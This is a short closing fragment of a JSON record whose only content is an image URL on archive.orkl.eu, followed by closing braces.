		"img": "https://archive.orkl.eu/d3da83f7607d8844044a61e4259359be1961ab6f.jpg"
	}
}